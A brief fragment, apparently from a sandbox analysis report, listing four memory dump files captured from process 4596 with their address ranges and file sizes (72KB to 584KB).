                                                                                                                  • memory/4596-6-0x0000000005750000-0x0000000005762000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/4596-3-0x0000000005350000-0x00000000053E2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    584KB

                                                                                                                  • memory/4596-7-0x0000000006340000-0x000000000637E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    248KB

                                                                                                                  • memory/4596-5-0x00000000053F0000-0x0000000005456000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    408KB